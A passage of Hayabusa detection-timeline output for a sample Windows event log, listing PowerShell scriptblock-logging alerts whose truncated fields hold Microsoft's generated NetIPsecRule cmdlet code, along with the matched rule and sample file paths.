-and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RequireAuthorization}) $__cmdletization_queryBuilder.FilterByProperty('RequireAuthorization', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('User') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${User}) $__cmdletization_queryBuilder.FilterByProperty('Users', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Machine') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Machine}) $__cmdletization_queryBuilde",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 19:09:44.774 +09:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,"hase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] 
${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] 
[Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { 
$__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('IPsecRuleName') -and (@('ByIPsecRuleName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${IPsecRuleName}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) 
$__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Mode') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Mode}) $__cmdletization_queryBuilder.FilterByProperty('Mode', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('InboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${InboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('InboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('OutboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${OutboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('OutboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('QuickModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${QuickModeCryptoSet}) $__cmdletization_queryBuilder.FilterByProperty('QuickModeCryptoSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase2AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase2AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase2AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('KeyModule') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${KeyModule}) $__cmdletization_queryBuilder.FilterByProperty('KeyModule', $__cmdletization_values, $false, 'Default') } if 
($PSBoundParameters.ContainsKey('AllowWatchKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowWatchKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowWatchKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowSetKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowSetKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowSetKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RemoteTunnelHostname') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RemoteTunnelHostname}) $__cmdletization_queryBuilder.FilterByProperty('RemoteTunnelEndpointDNSName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('ForwardPathLifetime') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${ForwardPathLifetime}) $__cmdletization_queryBuilder.FilterByProperty('MaxReturnPathLifetimeSeconds', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('EncryptedTunnelBypass') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${EncryptedTunnelBypass}) $__cmdletization_queryBuilder.FilterByProperty('BypassTunnelIfEncrypted', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RequireAuthorization') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RequireAuthorization}) $__cmdletization_queryBuilder.FilterByProperty('RequireAuthorization', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('User') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${User}) $__cmdletization_queryBuilder.FilterByProperty('Users', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Machine') -and 
(@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Machine}) $__cmdletization_queryBuilde",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 19:09:44.774 +09:00,srvdefender01.offsec.lan,4104,medium,,Potentially Malicious PwSh,"r.FilterByProperty('Machines', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetConSecRuleFilterByAddress', 'PartComponent', 
'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceFilter') -and (@('ByAssociatedNetFirewallInterfaceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceFilter}, 'MSFT_NetConSecRuleFilterByInterface', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceTypeFilter') -and (@('ByAssociatedNetFirewallInterfaceTypeFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceTypeFilter}, 'MSFT_NetConSecRuleFilterByInterfaceType', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallPortFilter') -and (@('ByAssociatedNetFirewallPortFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallPortFilter}, 'MSFT_NetConSecRuleFilterByProtocolPort', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetConSecRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase2AuthSet') -and (@('ByAssociatedNetIPsecPhase2AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase2AuthSet}, 'MSFT_NetConSecRuleEMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet') -and (@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 
'MSFT_NetConSecRuleMMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecQuickModeCryptoSet') -and (@('ByAssociatedNetIPsecQuickModeCryptoSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecQuickModeCryptoSet}, 'MSFT_NetConSecRuleQMCryptoSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 
'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('Disable', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember 
-Function 'Disable-NetIPsecRule' -Alias '*' function Sync-NetIPsecRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance[]])] param( [Parameter(ParameterSetName='ByIPsecRuleName', Mandatory=$true, Position=0, ValueFromPipelineByPropertyName=$true)] [Alias('ID','Name')] [ValidateNotNull()] [string[]] ${IPsecRuleName}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode[]] ${Mode}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecIn')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${InboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecOut')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${OutboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${QuickModeCryptoSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase2AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule[]] ${KeyModule}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowWatchKey}, 
[Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowSetKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${RemoteTunnelHostname}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [uint32[]] ${ForwardPathLifetime}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${EncryptedTunnelBypass}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${RequireAuthorization}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${User}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Machine}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] [ValidateNotNull()] [ciminstance] ${Asso",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 
19:09:44.774 +09:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,"r.FilterByProperty('Machines', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetConSecRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceFilter') -and (@('ByAssociatedNetFirewallInterfaceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceFilter}, 'MSFT_NetConSecRuleFilterByInterface', 'PartComponent', 'GroupComponent', 'Default') } if 
($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceTypeFilter') -and (@('ByAssociatedNetFirewallInterfaceTypeFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceTypeFilter}, 'MSFT_NetConSecRuleFilterByInterfaceType', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallPortFilter') -and (@('ByAssociatedNetFirewallPortFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallPortFilter}, 'MSFT_NetConSecRuleFilterByProtocolPort', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetConSecRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase2AuthSet') -and (@('ByAssociatedNetIPsecPhase2AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase2AuthSet}, 'MSFT_NetConSecRuleEMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet') -and (@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetConSecRuleMMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecQuickModeCryptoSet') -and (@('ByAssociatedNetIPsecQuickModeCryptoSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecQuickModeCryptoSet}, 'MSFT_NetConSecRuleQMCryptoSet', 'PartComponent', 
